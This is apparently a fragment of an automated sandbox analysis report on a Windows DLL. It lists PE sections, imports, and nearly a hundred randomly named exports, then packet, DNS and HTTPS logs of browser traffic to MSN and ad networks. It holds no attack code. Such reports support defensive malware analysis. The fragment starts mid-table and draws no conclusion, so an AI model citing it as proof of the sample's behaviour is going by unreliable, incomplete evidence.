.rsrc	0x23000	0xf8	0x200	False	0.3359375	data	2.52105374013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x24000	0xdb0	0xe00	False	0.775948660714	data	6.46060411689	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x23060	0x91	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

GetProcessHeap, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, GetFileType, LCMapStringW, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10001770
abetfoehywujav	2	0x10001d70
abjqkqaxstop	3	0x10001c10
ajpbyuft	4	0x10001bf0
bbhsvdgoflsvrehbv	5	0x10001bb0
bgaczbrymtutcgcv	6	0x10001f90
bhhldvlgw	7	0x10001ce0
bjlhlmgkbv	8	0x10001a10
bphuvgsyzsy	9	0x10001e30
bprasvgtwfehg	10	0x10001c30
brgxrnwyemiq	11	0x10001ca0
bvvmtjecffwy	12	0x10001af0
cbgrpwmokvxs	13	0x10001ea0
cblyrwjqkzkcucpuh	14	0x10001f60
chxoiqtyujrssr	15	0x10001cf0
ciyldekp	16	0x10001c20
cnhovrnvxhcywvkon	17	0x10001e20
cpznlfmvm	18	0x10001f70
cuqunwcpgogtyevhl	19	0x10001e80
czpvnrsdonpgrnde	20	0x10001d30
dmxipqncupogltn	21	0x10001b60
dnnzvlgnmav	22	0x10001c70
dqnkttdidxizzg	23	0x10001d60
eeumbdcqbiht	24	0x10001e50
eieerzavusdpjop	25	0x10001b00
emqfsjj	26	0x10001b30
erorsuvs	27	0x10001d80
fctelhvhpg	28	0x10001a70
ffqyvcgnssiipmh	29	0x10001e60
fvulzgrw	30	0x10001bc0
fxfrsykpe	31	0x10001fa0
gxjjeinbpkce	32	0x10001d50
hauvfpfx	33	0x10001a00
hxsmecahsrjgis	34	0x10001b00
ihcmfnqbofdwsudjl	35	0x10001dd0
iihcqfzhkncj	36	0x10001da0
irzmfrf	37	0x10001f20
iupdnirmmdhabmyx	38	0x10001ac0
iyacydfnbjqo	39	0x10001a60
jddrsetnqmhys	40	0x10001b20
jlmoczpaif	41	0x10001dc0
kbbecyllno	42	0x10001d10
kfmdjpgzdwurxnm	43	0x10001eb0
lnmxmyogarl	44	0x10001a70
lrmbtjfovopq	45	0x10001ef0
ndjvfncntsarbtryo	46	0x10001b40
nifvorxrmpfcvvx	47	0x10001b90
nigiglry	48	0x10001f10
nufpgayn	49	0x10001e40
ocxlxvmovdqf	50	0x10001a30
omkyipjt	51	0x10001c40
ovfkfmqcqymgetd	52	0x10001ed0
ovvlkrfmllvp	53	0x10001ad0
phgbilbfau	54	0x10001d20
pqqqwrks	55	0x10001df0
ptdmijntigffr	56	0x10001f80
pyotlhgzcu	57	0x10001b80
qqscpfele	58	0x10001de0
rgsajlrg	59	0x10001a80
roiqvfibu	60	0x10001c00
rzihucnlbdgos	61	0x10001f30
sbpgrhuemtuuq	62	0x10001a40
sqkpujlrcpucr	63	0x10001bd0
ssqgsbvnhx	64	0x10001ab0
szizedpoysfo	65	0x10001b10
tmgjeevkuurdtrk	66	0x10001a20
ttaxtjdjtdjiee	67	0x10001f40
tvcpahkbxqyhnnc	68	0x10001a50
tvglxtgkgzsyca	69	0x10001e00
twydxmkusf	70	0x10001db0
tzzxzqpw	71	0x10001d90
ueiapjcad	72	0x10001ba0
uletoyopebpx	73	0x10001f00
uqswjnuw	74	0x10001c80
urzkdveepasmrpudk	75	0x10001cc0
uukwkhzduwj	76	0x10001be0
uvqtmfgwogcw	77	0x10001b70
uxkmwuiejxnr	78	0x10001c50
vapbyjogsowspfb	79	0x10001aa0
vnkorawkjnjgycps	80	0x10001cd0
vpeeyjmnh	81	0x10001ec0
wepmqpw	82	0x10001c60
wgygjcmexpqwshgbp	83	0x10001d00
whnbkohdwwiblh	84	0x10001d40
wicumjhxdj	85	0x10001b50
wivfgdejpohgiy	86	0x10001f50
wnohpiufxf	87	0x10001a90
wnrdurpotljyl	88	0x10001e10
wojlutgfnsgpgmorr	89	0x10001ee0
wztnbabtdrbxzef	90	0x10001e90
xtnpymvnud	91	0x10001b50
xxbabasgsypcur	92	0x100019f0
ycudorqavij	93	0x10001cb0
yvlncphsvhkuhs	94	0x10001c90
zhiedbtxigvoqd	95	0x10001ae0
zubvyuefrvwwip	96	0x10001e70

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 14:29:18.801350117 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.801384926 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.801450968 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.801548958 CET	49756	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.801575899 CET	443	49756	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.801640034 CET	49756	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.802921057 CET	49756	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.802947044 CET	443	49756	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.803256035 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.803287983 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.853137970 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.853226900 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.855067968 CET	443	49756	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.855174065 CET	49756	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.860797882 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.860819101 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.861080885 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.861092091 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.861105919 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.861150980 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.889566898 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.889620066 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.889656067 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.889689922 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.889724970 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.889758110 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.889791012 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.889893055 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.892047882 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.892060995 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.892064095 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.892067909 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.892071009 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.892074108 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.892076969 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.892080069 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.892096996 CET	49757	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.892117023 CET	443	49757	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.907177925 CET	49756	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:18.907202959 CET	443	49756	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.907625914 CET	443	49756	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:18.907704115 CET	49756	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:28.832056046 CET	49759	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.832109928 CET	443	49759	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.832197905 CET	49759	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.832324982 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.832362890 CET	443	49760	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.832422972 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.833108902 CET	49759	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.833139896 CET	443	49759	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.833210945 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.833228111 CET	443	49760	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.898293972 CET	443	49760	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.898461103 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.899589062 CET	443	49759	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.899658918 CET	49759	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.959307909 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.959338903 CET	443	49760	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.959716082 CET	443	49760	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.959779978 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.964648008 CET	49759	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.964677095 CET	443	49759	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.965264082 CET	443	49759	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:28.965344906 CET	49759	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:28.988403082 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:28.988511086 CET	443	49761	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:28.988559008 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:28.988576889 CET	443	49762	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:28.988601923 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:28.988646030 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:28.988774061 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:29.008083105 CET	443	49760	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:29.008171082 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:29.008177996 CET	443	49760	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:29.008225918 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:29.009711981 CET	49760	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:29:29.009746075 CET	443	49760	142.250.203.102	192.168.2.5
Nov 22, 2021 14:29:29.072274923 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.072290897 CET	443	49761	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.123708010 CET	443	49761	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.123790026 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.394665003 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.394700050 CET	443	49762	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.394774914 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.394809008 CET	443	49761	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.395384073 CET	443	49761	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.395463943 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.395822048 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.436871052 CET	443	49761	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.439522982 CET	443	49762	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.439675093 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.473973989 CET	443	49761	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.474072933 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.474081039 CET	443	49761	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.474186897 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.508193016 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.508220911 CET	443	49762	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.508621931 CET	443	49762	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:29.508707047 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.554924011 CET	49761	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:29.554968119 CET	443	49761	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:33.839202881 CET	443	49756	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:33.839342117 CET	49756	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:33.839354992 CET	443	49756	172.67.70.134	192.168.2.5
Nov 22, 2021 14:29:33.839426041 CET	49756	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:29:44.430932999 CET	443	49762	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:44.431051970 CET	443	49762	104.26.3.70	192.168.2.5
Nov 22, 2021 14:29:44.431191921 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:29:44.431211948 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:30:37.917088985 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:30:37.917133093 CET	443	49762	104.26.3.70	192.168.2.5
Nov 22, 2021 14:30:37.917146921 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:30:37.917221069 CET	49762	443	192.168.2.5	104.26.3.70
Nov 22, 2021 14:30:37.917640924 CET	49759	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:30:37.917695045 CET	49759	443	192.168.2.5	142.250.203.102
Nov 22, 2021 14:30:37.918078899 CET	49756	443	192.168.2.5	172.67.70.134
Nov 22, 2021 14:30:37.918113947 CET	49756	443	192.168.2.5	172.67.70.134

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 14:28:49.704560995 CET	64936	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:28:54.533123016 CET	54302	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:28:55.437889099 CET	53784	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:28:55.458055019 CET	53	53784	8.8.8.8	192.168.2.5
Nov 22, 2021 14:28:57.111588001 CET	65307	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:28:57.134823084 CET	53	65307	8.8.8.8	192.168.2.5
Nov 22, 2021 14:29:00.386215925 CET	64344	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:29:00.405869007 CET	53	64344	8.8.8.8	192.168.2.5
Nov 22, 2021 14:29:01.498487949 CET	62060	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:29:17.838159084 CET	65447	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:29:18.691239119 CET	52441	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:29:18.712405920 CET	53	52441	8.8.8.8	192.168.2.5
Nov 22, 2021 14:29:28.688193083 CET	62176	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:29:28.717139959 CET	53	62176	8.8.8.8	192.168.2.5
Nov 22, 2021 14:29:28.894833088 CET	59596	53	192.168.2.5	8.8.8.8
Nov 22, 2021 14:29:28.916603088 CET	53	59596	8.8.8.8	192.168.2.5
Nov 22, 2021 14:29:30.198256969 CET	65296	53	192.168.2.5	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 22, 2021 14:28:49.704560995 CET	192.168.2.5	8.8.8.8	0xecb9	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:54.533123016 CET	192.168.2.5	8.8.8.8	0x644a	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:55.437889099 CET	192.168.2.5	8.8.8.8	0x3acf	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:57.111588001 CET	192.168.2.5	8.8.8.8	0x41e1	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:00.386215925 CET	192.168.2.5	8.8.8.8	0xcbd4	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:01.498487949 CET	192.168.2.5	8.8.8.8	0x61c8	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:17.838159084 CET	192.168.2.5	8.8.8.8	0x82d2	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:18.691239119 CET	192.168.2.5	8.8.8.8	0x61b8	Standard query (0)	btloader.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:28.688193083 CET	192.168.2.5	8.8.8.8	0xf7a5	Standard query (0)	ad.doubleclick.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:28.894833088 CET	192.168.2.5	8.8.8.8	0x9d25	Standard query (0)	ad-delivery.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:30.198256969 CET	192.168.2.5	8.8.8.8	0xcdbd	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 22, 2021 14:28:49.723954916 CET	8.8.8.8	192.168.2.5	0xecb9	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:28:54.553054094 CET	8.8.8.8	192.168.2.5	0x644a	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:28:55.458055019 CET	8.8.8.8	192.168.2.5	0x3acf	No error (0)	contextual.media.net		2.18.160.23	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:57.134823084 CET	8.8.8.8	192.168.2.5	0x41e1	No error (0)	lg3.media.net		2.18.160.23	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:00.405869007 CET	8.8.8.8	192.168.2.5	0xcbd4	No error (0)	hblg.media.net		2.18.160.23	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:01.518820047 CET	8.8.8.8	192.168.2.5	0x61c8	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:29:17.859129906 CET	8.8.8.8	192.168.2.5	0x82d2	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:29:18.712405920 CET	8.8.8.8	192.168.2.5	0x61b8	No error (0)	btloader.com		172.67.70.134	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:18.712405920 CET	8.8.8.8	192.168.2.5	0x61b8	No error (0)	btloader.com		104.26.7.139	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:18.712405920 CET	8.8.8.8	192.168.2.5	0x61b8	No error (0)	btloader.com		104.26.6.139	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:28.717139959 CET	8.8.8.8	192.168.2.5	0xf7a5	No error (0)	ad.doubleclick.net	dart.l.doubleclick.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:29:28.717139959 CET	8.8.8.8	192.168.2.5	0xf7a5	No error (0)	dart.l.doubleclick.net		142.250.203.102	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:28.916603088 CET	8.8.8.8	192.168.2.5	0x9d25	No error (0)	ad-delivery.net		104.26.3.70	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:28.916603088 CET	8.8.8.8	192.168.2.5	0x9d25	No error (0)	ad-delivery.net		104.26.2.70	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:28.916603088 CET	8.8.8.8	192.168.2.5	0x9d25	No error (0)	ad-delivery.net		172.67.69.19	A (IP address)	IN (0x0001)
Nov 22, 2021 14:29:30.217794895 CET	8.8.8.8	192.168.2.5	0xcdbd	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:29:30.217794895 CET	8.8.8.8	192.168.2.5	0xcdbd	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

https:

btloader.com

ad.doubleclick.net

ad-delivery.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49757	172.67.70.134	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-22 13:29:18 UTC	0	OUT	GET /tag?o=6208086025961472&upapi=true HTTP/1.1 Accept: application/javascript, /;q=0.8 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: btloader.com Connection: Keep-Alive
2021-11-22 13:29:18 UTC	0	IN	HTTP/1.1 200 OK Date: Mon, 22 Nov 2021 13:29:18 GMT Content-Type: application/javascript Content-Length: 10157 Connection: close Cache-Control: public, max-age=1800, must-revalidate Etag: "643eb1aad6ba3932ca744b96ffc00048" Vary: Origin Via: 1.1 google CF-Cache-Status: HIT Age: 2610 Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c%2F3wFlbJEoPhaGnxVMHSn1QGiQjUEXM1sHDQZf48JEA6uerDzXMti9ubLCVkAmqaFO4Keo9XAtz%2Fv5wBuUOrZlecZSH%2FRZ0FJBPVC378dzzmtpD6pgRYyG9E%2FQMg8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6b228184fa5768fe-FRA
2021-11-22 13:29:18 UTC	1	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 69 2c 63 2c 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 63 3d 63 7c 7c 50 72 6f 6d 69 73 65 29 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 28 6c 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 72 28 6c 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6e 28 65 2e 76 61 6c 75 65 29 3a 28 28 74 3d 65 2e 76 61 6c 75 65 29 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 74 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c\|\|Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
2021-11-22 13:29:18 UTC	1	IN	Data Raw: 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 63 3b 29 74 72 79 7b 69 66 28 61 3d 31 2c 72 26 26 28 69 3d 32 26 74 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 74 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 69 3d 72 2e 72 65 74 75 72 6e 29 26 26 69 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 69 3d 69 2e 63 61 6c 6c 28 72 2c 74 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 69 3b 73 77 69 74 63 68 28 72 3d 30 2c 69 26 26 28 74 3d 5b 32 26 74 5b 30 5d 2c 69 2e 76 61 6c 75 65 5d 29 2c 74 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 69 3d 74 3b Data Ascii: nction(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw\|\|((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.value]),t[0]){case 0:case 1:i=t;
2021-11-22 13:29:18 UTC	2	IN	Data Raw: 6e 74 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 76 61 72 20 75 2c 61 2c 64 2c 62 2c 6d 3b 75 3d 22 36 32 30 38 30 38 36 30 32 35 39 36 31 34 37 32 22 2c 61 3d 22 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 64 3d 22 61 70 69 2e 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 62 3d 22 32 2e 30 2e 32 2d 32 2d 67 66 64 63 39 30 35 34 22 2c 6d 3d 22 22 3b 76 61 72 20 6f 3d 7b 22 6d 73 6e 2e 63 6f 6d 22 3a 7b 22 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 77 65 62 73 69 74 65 5f 69 64 22 3a 22 35 36 37 31 37 33 37 33 38 38 36 39 35 35 35 32 22 7d 7d 2c 77 3d 7b 74 72 61 63 65 49 44 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 Data Ascii: nt).appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0.2-2-gfdc9054",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"}},w={traceID:function(e,t,n){if
